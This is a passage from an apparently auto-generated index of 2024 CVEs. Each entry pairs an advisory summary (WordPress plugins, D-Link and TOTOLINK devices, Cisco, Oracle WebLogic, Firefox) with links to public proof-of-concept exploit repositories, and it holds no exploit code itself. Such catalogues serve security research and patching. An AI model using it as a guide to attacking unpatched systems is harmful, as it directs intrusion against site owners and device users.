/goform/formEasySetTimezone. Durch das Beeinflussen des Arguments curTime mit unbekannten Daten kann eine buffer overflow-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [dylvie/CVE-2024-9570_D-Link-DIR-619L-bof](https://github.com/dylvie/CVE-2024-9570_D-Link-DIR-619L-bof) + +### CVE-2024-9593 (2024-10-18) + +The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the 'etimeclockwp_load_function_callback' function. This allows unauthenticated attackers to execute code on the server. The invoked function's parameters cannot be specified. + + +- [RandomRobbieBF/CVE-2024-9593](https://github.com/RandomRobbieBF/CVE-2024-9593) +- [0x4f5da2-venom/CVE-2024-9593-EXP](https://github.com/0x4f5da2-venom/CVE-2024-9593-EXP) + +### CVE-2024-9680 (2024-10-09) + +An attacker was able to achieve code execution in the content process by exploiting a use-after-free in Animation timelines. We have had reports of this vulnerability being exploited in the wild. This vulnerability affects Firefox < 131.0.2, Firefox ESR < 128.3.1, Firefox ESR < 115.16.1, Thunderbird < 131.0.1, Thunderbird < 128.3.1, and Thunderbird < 115.16.0. + + +- [tdonaworth/Firefox-CVE-2024-9680](https://github.com/tdonaworth/Firefox-CVE-2024-9680) + +### CVE-2024-9707 (2024-10-11) + +The Hunk Companion plugin for WordPress is vulnerable to unauthorized plugin installation/activation due to a missing capability check on the /wp-json/hc/v1/themehunk-import REST API endpoint in all versions up to, and including, 1.8.4. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. + + +- [RandomRobbieBF/CVE-2024-9707](https://github.com/RandomRobbieBF/CVE-2024-9707) + +### CVE-2024-9796 (2024-10-10) + +The WP-Advanced-Search WordPress plugin before 3.3.9.2 does not sanitize and escape the t parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks + + +- [RandomRobbieBF/CVE-2024-9796](https://github.com/RandomRobbieBF/CVE-2024-9796) +- [issamjr/CVE-2024-9796](https://github.com/issamjr/CVE-2024-9796) + +### CVE-2024-9821 (2024-10-12) + +The Bot for Telegram on WooCommerce plugin for WordPress is vulnerable to sensitive information disclosure due to missing authorization checks on the 'stm_wpcfto_get_settings' AJAX action in all versions up to, and including, 1.2.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to view the Telegram Bot Token, a secret token used to control the bot, which can then be used to log in as any existing user on the site, such as an administrator, if they know the username, due to the Login with Telegram feature. + + +- [RandomRobbieBF/CVE-2024-9821](https://github.com/RandomRobbieBF/CVE-2024-9821) + +### CVE-2024-9890 (2024-10-26) + +The User Toolkit plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.2.3. This is due to an improper capability check in the 'switchUser' function. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to log in as any existing user on the site, such as an administrator. + + +- [RandomRobbieBF/CVE-2024-9890](https://github.com/RandomRobbieBF/CVE-2024-9890) + +### CVE-2024-9926 (2024-11-07) + +The Jetpack WordPress plugin does not have proper authorisation in one of its REST endpoint, allowing any authenticated users, such as subscriber to read arbitrary feedbacks data sent via the Jetpack Contact Form + + +- [m3ssap0/wordpress-jetpack-broken-access-control-vulnerable-application](https://github.com/m3ssap0/wordpress-jetpack-broken-access-control-vulnerable-application) +- [m3ssap0/wordpress-jetpack-broken-access-control-exploit](https://github.com/m3ssap0/wordpress-jetpack-broken-access-control-exploit) + +### CVE-2024-9932 (2024-10-26) + +The Wux Blog Editor plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'wuxbt_insertImageNew' function in versions up to, and including, 3.0.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. + + +- [RandomRobbieBF/CVE-2024-9932](https://github.com/RandomRobbieBF/CVE-2024-9932) + +### CVE-2024-9933 (2024-10-26) + +The WatchTowerHQ plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.6. This is due to the 'watchtower_ota_token' default value is empty, and the not empty check is missing in the 'Password_Less_Access::login' function. This makes it possible for unauthenticated attackers to log in to the WatchTowerHQ client administrator user. + + +- [RandomRobbieBF/CVE-2024-9933](https://github.com/RandomRobbieBF/CVE-2024-9933) + +### CVE-2024-9935 (2024-11-16) + +The PDF Generator Addon for Elementor Page Builder plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.7.5 via the rtw_pgaepb_dwnld_pdf() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. + + +- [RandomRobbieBF/CVE-2024-9935](https://github.com/RandomRobbieBF/CVE-2024-9935) + +### CVE-2024-9955 (2024-10-15) + +Use after free in WebAuthentication in Google Chrome prior to 130.0.6723.58 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) + + +- [amfg145/CVE-2024-9955-POC](https://github.com/amfg145/CVE-2024-9955-POC) + +### CVE-2024-10015 (2024-11-16) + +The ConvertCalculator for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' and 'type' parameters in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + + +- [windz3r0day/CVE-2024-10015](https://github.com/windz3r0day/CVE-2024-10015) + +### CVE-2024-10140 (2024-10-19) + +Eine kritische Schwachstelle wurde in code-projects Pharmacy Management System 1.0 entdeckt. Betroffen davon ist ein unbekannter Prozess der Datei /manage_supplier.php. Durch Beeinflussen des Arguments id mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [holypryx/CVE-2024-10140](https://github.com/holypryx/CVE-2024-10140) + +### CVE-2024-10220 (2024-11-22) + +The Kubernetes kubelet component allows arbitrary command execution via specially crafted gitRepo volumes.This issue affects kubelet: through 1.28.11, from 1.29.0 through 1.29.6, from 1.30.0 through 1.30.2. + + +- [mochizuki875/CVE-2024-10220-githooks](https://github.com/mochizuki875/CVE-2024-10220-githooks) + +### CVE-2024-10245 (2024-11-12) + +The Relais 2FA plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.0. This is due to incorrect authentication and capability checking in the 'rl_do_ajax' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email. + + +- [RandomRobbieBF/CVE-2024-10245](https://github.com/RandomRobbieBF/CVE-2024-10245) + +### CVE-2024-10354 (2024-10-25) + +In SourceCodester Petrol Pump Management Software 1.0 wurde eine kritische Schwachstelle entdeckt. Das betrifft eine unbekannte Funktionalität der Datei /admin/print.php. Mit der Manipulation des Arguments id mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung. + + +- [K1nako0/CVE-2024-10354](https://github.com/K1nako0/CVE-2024-10354) + +### CVE-2024-10355 (2024-10-25) + +Eine kritische Schwachstelle wurde in SourceCodester Petrol Pump Management Software 1.0 entdeckt. Dies betrifft einen unbekannten Teil der Datei /admin/invoice.php. Durch die Manipulation des Arguments id mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [K1nako0/CVE-2024-10355](https://github.com/K1nako0/CVE-2024-10355) + +### CVE-2024-10410 (2024-10-27) + +In SourceCodester Online Hotel Reservation System 1.0 wurde eine kritische Schwachstelle entdeckt. Dabei geht es um die Funktion upload der Datei /admin/mod_room/controller.php?action=add. Dank Manipulation des Arguments image mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [K1nako0/CVE-2024-10410](https://github.com/K1nako0/CVE-2024-10410) + +### CVE-2024-10448 (2024-10-28) + +Eine problematische Schwachstelle wurde in code-projects Blood Bank Management System 1.0 entdeckt. Betroffen davon ist ein unbekannter Prozess der Datei /file/delete.php. Dank Manipulation des Arguments bid mit unbekannten Daten kann eine cross-site request forgery-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [bevennyamande/CVE-2024-10448](https://github.com/bevennyamande/CVE-2024-10448) + +### CVE-2024-10449 (2024-10-28) + +Es wurde eine kritische Schwachstelle in Codezips Hospital Appointment System 1.0 gefunden. Betroffen hiervon ist ein unbekannter Ablauf der Datei /loginAction.php. Mit der Manipulation des Arguments Username mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [g-u-i-d/CVE-2024-10449-patch](https://github.com/g-u-i-d/CVE-2024-10449-patch) + +### CVE-2024-10470 (2024-11-09) + +The WPLMS Learning Management System for WordPress, WordPress LMS theme for WordPress is vulnerable to arbitrary file read and deletion due to insufficient file path validation and permissions checks in the readfile and unlink functions in all versions up to, and including, 4.962. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). The theme is vulnerable even when it is not activated. + + +- [RandomRobbieBF/CVE-2024-10470](https://github.com/RandomRobbieBF/CVE-2024-10470) + +### CVE-2024-10508 (2024-11-09) + +The RegistrationMagic – User Registration Plugin with Custom Registration Forms plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 6.0.2.6. This is due to the plugin not properly validating the password reset token prior to updating a user's password. This makes it possible for unauthenticated attackers to reset the password of arbitrary users, including administrators, and gain access to these accounts. + + +- [ubaii/CVE-2024-10508](https://github.com/ubaii/CVE-2024-10508) +- [Jenderal92/CVE-2024-10508](https://github.com/Jenderal92/CVE-2024-10508) + +### CVE-2024-10542 (2024-11-26) + +The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an authorization bypass via reverse DNS spoofing on the checkWithoutToken function in all versions up to, and including, 6.43.2. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. + + +- [ubaii/CVE-2024-10542](https://github.com/ubaii/CVE-2024-10542) + +### CVE-2024-10557 (2024-10-31) + +In code-projects Blood Bank Management System 1.0 wurde eine Schwachstelle gefunden. Sie wurde als problematisch eingestuft. Hierbei betrifft es unbekannten Programmcode der Datei /file/updateprofile.php. Mit der Manipulation mit unbekannten Daten kann eine cross-site request forgery-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [bevennyamande/CVE-2024-10557](https://github.com/bevennyamande/CVE-2024-10557) + +### CVE-2024-10586 (2024-11-09) + +The Debug Tool plugin for WordPress is vulnerable to arbitrary file creation due to a missing capability check on the dbt_pull_image() function and missing file type validation in all versions up to, and including, 2.2. This makes it possible for unauthenticated attackers to to create arbitrary files such as .php files that can be leveraged for remote code execution. + + +- [RandomRobbieBF/CVE-2024-10586](https://github.com/RandomRobbieBF/CVE-2024-10586) + +### CVE-2024-10592 (2024-11-16) + +The Mapster WP Maps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the popup class parameter in all versions up to, and including, 1.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + + +- [windz3r0day/CVE-2024-10592](https://github.com/windz3r0day/CVE-2024-10592) + +### CVE-2024-10605 (2024-10-31) + +Es wurde eine Schwachstelle in code-projects Blood Bank Management System 1.0 ausgemacht. Sie wurde als problematisch eingestuft. Es betrifft eine unbekannte Funktion der Datei /file/request.php. Durch die Manipulation mit unbekannten Daten kann eine cross-site request forgery-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [bevennyamande/CVE-2024-10605](https://github.com/bevennyamande/CVE-2024-10605) + +### CVE-2024-10629 (2024-11-13) + +The GPX Viewer plugin for WordPress is vulnerable to arbitrary file creation due to a missing capability check and file type validation in the gpxv_file_upload() function in all versions up to, and including, 2.2.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to create arbitrary files on the affected site's server which may make remote code execution possible. + + +- [RandomRobbieBF/CVE-2024-10629](https://github.com/RandomRobbieBF/CVE-2024-10629) + +### CVE-2024-10654 (2024-11-01) + +In TOTOLINK LR350 bis 9.3.5u.6369 wurde eine Schwachstelle gefunden. Sie wurde als kritisch eingestuft. Betroffen ist eine unbekannte Verarbeitung der Datei /formLoginAuth.htm. Dank der Manipulation des Arguments authCode mit der Eingabe 1 mit unbekannten Daten kann eine authorization bypass-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 9.3.5u.6698_B20230810 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [c0nyy/IoT_vuln](https://github.com/c0nyy/IoT_vuln) + +### CVE-2024-10728 (2024-11-16) + +The Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX plugin for WordPress is vulnerable to unauthorized plugin installation/activation due to a missing capability check on the 'install_required_plugin_callback' function in all versions up to, and including, 4.1.16. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. + + +- [RandomRobbieBF/CVE-2024-10728](https://github.com/RandomRobbieBF/CVE-2024-10728) + +### CVE-2024-10793 (2024-11-15) + +The WP Activity Log plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user_id parameter in all versions up to, and including, 5.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrative user accesses an injected page. + + +- [windz3r0day/CVE-2024-10793](https://github.com/windz3r0day/CVE-2024-10793) + +### CVE-2024-10914 (2024-11-06) + +In D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L bis 20241028 wurde eine kritische Schwachstelle ausgemacht. Hierbei betrifft es die Funktion cgi_user_add der Datei /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. Durch Manipulation des Arguments name mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Die Komplexität eines Angriffs ist eher hoch. Sie gilt als schwierig ausnutzbar. Der Exploit steht zur öffentlichen Verfügung. + + +- [imnotcha0s/CVE-2024-10914](https://github.com/imnotcha0s/CVE-2024-10914) +- [verylazytech/CVE-2024-10914](https://github.com/verylazytech/CVE-2024-10914) +- [Egi08/CVE-2024-10914](https://github.com/Egi08/CVE-2024-10914) +- [Bu0uCat/D-Link-NAS-CVE-2024-10914-](https://github.com/Bu0uCat/D-Link-NAS-CVE-2024-10914-) +- [ThemeHackers/CVE-2024-10914](https://github.com/ThemeHackers/CVE-2024-10914) +- [retuci0/cve-2024-10914-port](https://github.com/retuci0/cve-2024-10914-port) +- [K3ysTr0K3R/CVE-2024-10914-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-10914-EXPLOIT) + +### CVE-2024-10924 (2024-11-15) + +The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This is due to improper user check error handling in the two-factor REST API actions with the 'check_login_and_get_user' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default). + + +- [RandomRobbieBF/CVE-2024-10924](https://github.com/RandomRobbieBF/CVE-2024-10924) +- [m3ssap0/wordpress-really-simple-security-authn-bypass-vulnerable-application](https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-vulnerable-application) +- [MattJButler/CVE-2024-10924](https://github.com/MattJButler/CVE-2024-10924) +- [m3ssap0/wordpress-really-simple-security-authn-bypass-exploit](https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-exploit) +- [julesbsz/CVE-2024-10924](https://github.com/julesbsz/CVE-2024-10924) +- [Trackflaw/CVE-2024-10924-Wordpress-Docker](https://github.com/Trackflaw/CVE-2024-10924-Wordpress-Docker) +- [Maalfer/CVE-2024-10924-PoC](https://github.com/Maalfer/CVE-2024-10924-PoC) + +### CVE-2024-10958 (2024-11-10) + +The The WP Photo Album Plus plugin for WordPress is vulnerable to arbitrary shortcode execution via getshortcodedrenderedfenodelay AJAX action in all versions up to, and including, 8.8.08.007 . This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. + + +- [reinh3rz/CVE-2024-10958-WPPA-Exploit](https://github.com/reinh3rz/CVE-2024-10958-WPPA-Exploit) + +### CVE-2024-11003 (2024-11-19) + +Qualys discovered that needrestart, before version 3.8, passes unsanitized data to a library (Modules::ScanDeps) which expects safe input. This could allow a local attacker to execute arbitrary shell commands. Please see the related CVE-2024-10224 in Modules::ScanDeps. + + +- [unknown-user-from/CVE-2024-11003-PoC](https://github.com/unknown-user-from/CVE-2024-11003-PoC) + +### CVE-2024-11199 (2024-11-23) + +The Rescue Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's rescue_progressbar shortcode in all versions up to, and including, 2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + + +- [windz3r0day/CVE-2024-11199](https://github.com/windz3r0day/CVE-2024-11199) + +### CVE-2024-11201 +- [NSQAQ/CVE-2024-11201](https://github.com/NSQAQ/CVE-2024-11201) + +### CVE-2024-11318 (2024-11-18) + +An IDOR (Insecure Direct Object Reference) vulnerability has been discovered in AbsysNet, affecting version 2.3.1. This vulnerability could allow a remote attacker to obtain the session of an unauthenticated user by brute-force attacking the session identifier on the "/cgi-bin/ocap/" endpoint. + + +- [xthalach/CVE-2024-11318](https://github.com/xthalach/CVE-2024-11318) + +### CVE-2024-11381 (2024-11-22) + +The Control horas plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ch_registro' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + + +- [windz3r0day/CVE-2024-11381](https://github.com/windz3r0day/CVE-2024-11381) + +### CVE-2024-11387 (2024-11-23) + +The Easy Liveblogs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'elb_liveblog' shortcode in all versions up to, and including, 2.3.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + + +- [windz3r0day/CVE-2024-11387](https://github.com/windz3r0day/CVE-2024-11387) + +### CVE-2024-11388 (2024-11-21) + +The Dino Game – Embed Google Chrome Dinosaur Game in WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'dino-game' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + + +- [windz3r0day/CVE-2024-11388](https://github.com/windz3r0day/CVE-2024-11388) + +### CVE-2024-11412 (2024-11-21) + +The Shine PDF Embeder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shinepdf' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + + +- [windz3r0day/CVE-2024-11412](https://github.com/windz3r0day/CVE-2024-11412) + +### CVE-2024-11428 (2024-11-21) + +The Lazy load videos and sticky control plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'lazy-load-videos-and-sticky-control' shortcode in all versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + + +- [windz3r0day/CVE-2024-11428](https://github.com/windz3r0day/CVE-2024-11428) + +### CVE-2024-11432 (2024-11-21) + +The SuevaFree Essential Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'counter' shortcode in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + + +- [windz3r0day/CVE-2024-11432](https://github.com/windz3r0day/CVE-2024-11432) + +### CVE-2024-12883 +- [mhtsec/cve-2024-12883](https://github.com/mhtsec/cve-2024-12883) + +### CVE-2024-20017 (2024-03-04) + +In wlan service, there is a possible out of bounds write due to improper input validation. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation Patch ID: WCNCR00350938; Issue ID: MSV-1132. + + +- [mellow-hype/cve-2024-20017](https://github.com/mellow-hype/cve-2024-20017) + +### CVE-2024-20291 (2024-02-28) + +A vulnerability in the access control list (ACL) programming for port channel subinterfaces of Cisco Nexus 3000 and 9000 Series Switches in standalone NX-OS mode could allow an unauthenticated, remote attacker to send traffic that should be blocked through an affected device.\r\n\r This vulnerability is due to incorrect hardware programming that occurs when configuration changes are made to port channel member ports. An attacker could exploit this vulnerability by attempting to send traffic through an affected device. A successful exploit could allow the attacker to access network resources that should be protected by an ACL that was applied on port channel subinterfaces. + + +- [Instructor-Team8/CVE-2024-20291-POC](https://github.com/Instructor-Team8/CVE-2024-20291-POC) + +### CVE-2024-20338 (2024-03-06) + +A vulnerability in the ISE Posture (System Scan) module of Cisco Secure Client for Linux could allow an authenticated, local attacker to elevate privileges on an affected device.\r\n\r This vulnerability is due to the use of an uncontrolled search path element. An attacker could exploit this vulnerability by copying a malicious library file to a specific directory in the filesystem and persuading an administrator to restart a specific process. A successful exploit could allow the attacker to execute arbitrary code on an affected device with root privileges. + + +- [annmuor/CVE-2024-20338](https://github.com/annmuor/CVE-2024-20338) + +### CVE-2024-20356 (2024-04-24) + +A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) could allow an authenticated, remote attacker with Administrator-level privileges to perform command injection attacks on an affected system and elevate their privileges to root. This vulnerability is due to insufficient user input validation. An attacker could exploit this vulnerability by sending crafted commands to the web-based management interface of the affected software. A successful exploit could allow the attacker to elevate their privileges to root. + + +- [nettitude/CVE-2024-20356](https://github.com/nettitude/CVE-2024-20356) +- [SherllyNeo/CVE_2024_20356](https://github.com/SherllyNeo/CVE_2024_20356) + +### CVE-2024-20404 (2024-06-05) + +A vulnerability in the web-based management interface of Cisco Finesse could allow an unauthenticated, remote attacker to conduct an SSRF attack on an affected system.\r\n\r This vulnerability is due to insufficient validation of user-supplied input for specific HTTP requests that are sent to an affected system. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to obtain limited sensitive information for services that are associated to the affected device. + + +- [AbdElRahmanEzzat1995/CVE-2024-20404](https://github.com/AbdElRahmanEzzat1995/CVE-2024-20404) + +### CVE-2024-20405 (2024-06-05) + +A vulnerability in the web-based management interface of Cisco Finesse could allow an unauthenticated, remote attacker to conduct a stored XSS attack by exploiting an RFI vulnerability. \r\n\r This vulnerability is due to insufficient validation of user-supplied input for specific HTTP requests that are sent to an affected device. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive information on the affected device. + + +- [AbdElRahmanEzzat1995/CVE-2024-20405](https://github.com/AbdElRahmanEzzat1995/CVE-2024-20405) + +### CVE-2024-20467 (2024-09-25) + +A vulnerability in the implementation of the IPv4 fragmentation reassembly code in Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.\r\n\r This vulnerability is due to improper management of resources during fragment reassembly. An attacker could exploit this vulnerability by sending specific sizes of fragmented packets to an affected device or through a Virtual Fragmentation Reassembly (VFR)-enabled interface on an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.\r\n\r Note: This vulnerability affects Cisco ASR 1000 Series Aggregation Services Routers and Cisco cBR-8 Converged Broadband Routers if they are running Cisco IOS XE Software Release 17.12.1 or 17.12.1a. + + +- [saler-cve/PoC-Exploit-CVE-2024-20467](https://github.com/saler-cve/PoC-Exploit-CVE-2024-20467) + +### CVE-2024-20656 (2024-01-09) + +Visual Studio Elevation of Privilege Vulnerability + + +- [Wh04m1001/CVE-2024-20656](https://github.com/Wh04m1001/CVE-2024-20656) + +### CVE-2024-20666 (2024-01-09) + +BitLocker Security Feature Bypass Vulnerability + + +- [nnotwen/Script-For-CVE-2024-20666](https://github.com/nnotwen/Script-For-CVE-2024-20666) +- [invaderslabs/CVE-2024-20666](https://github.com/invaderslabs/CVE-2024-20666) + +### CVE-2024-20696 (2024-01-09) + +Windows libarchive Remote Code Execution Vulnerability + + +- [clearbluejar/CVE-2024-20696](https://github.com/clearbluejar/CVE-2024-20696) + +### CVE-2024-20698 (2024-01-09) + +Windows Kernel Elevation of Privilege Vulnerability + + +- [RomanRybachek/CVE-2024-20698](https://github.com/RomanRybachek/CVE-2024-20698) + +### CVE-2024-20746 (2024-03-18) + +Premiere Pro versions 24.1, 23.6.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. + + +- [200101WhoAmI/CVE-2024-20746](https://github.com/200101WhoAmI/CVE-2024-20746) + +### CVE-2024-20767 (2024-03-18) + +ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction. + + +- [yoryio/CVE-2024-20767](https://github.com/yoryio/CVE-2024-20767) +- [m-cetin/CVE-2024-20767](https://github.com/m-cetin/CVE-2024-20767) +- [Chocapikk/CVE-2024-20767](https://github.com/Chocapikk/CVE-2024-20767) +- [Praison001/CVE-2024-20767-Adobe-ColdFusion](https://github.com/Praison001/CVE-2024-20767-Adobe-ColdFusion) + +### CVE-2024-20931 (2024-02-17) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). + + +- [GlassyAmadeus/CVE-2024-20931](https://github.com/GlassyAmadeus/CVE-2024-20931) +- [Leocodefocus/CVE-2024-20931-Poc](https://github.com/Leocodefocus/CVE-2024-20931-Poc) +- [ATonysan/CVE-2024-20931_weblogic](https://github.com/ATonysan/CVE-2024-20931_weblogic) +- [dinosn/CVE-2024-20931](https://github.com/dinosn/CVE-2024-20931) + +### CVE-2024-21006 (2024-04-16) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). + + +- [momika233/CVE-2024-21006](https://github.com/momika233/CVE-2024-21006) +- [lightr3d/CVE-2024-21006_jar](https://github.com/lightr3d/CVE-2024-21006_jar) +- [dadvlingd/CVE-2024-21006](https://github.com/dadvlingd/CVE-2024-21006) + +### CVE-2024-21107 (2024-04-16) + +Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: This vulnerability applies to Windows hosts only. CVSS 3.1 Base Score 6.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H). + + +- [Alaatk/CVE-2024-21107](https://github.com/Alaatk/CVE-2024-21107) + +### CVE-2024-21111 (2024-04-16) + +Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.16. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: This vulnerability applies to Windows hosts only. CVSS 3.1 Base Score 7.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). + + +- [mansk1es/CVE-2024-21111](https://github.com/mansk1es/CVE-2024-21111) +- 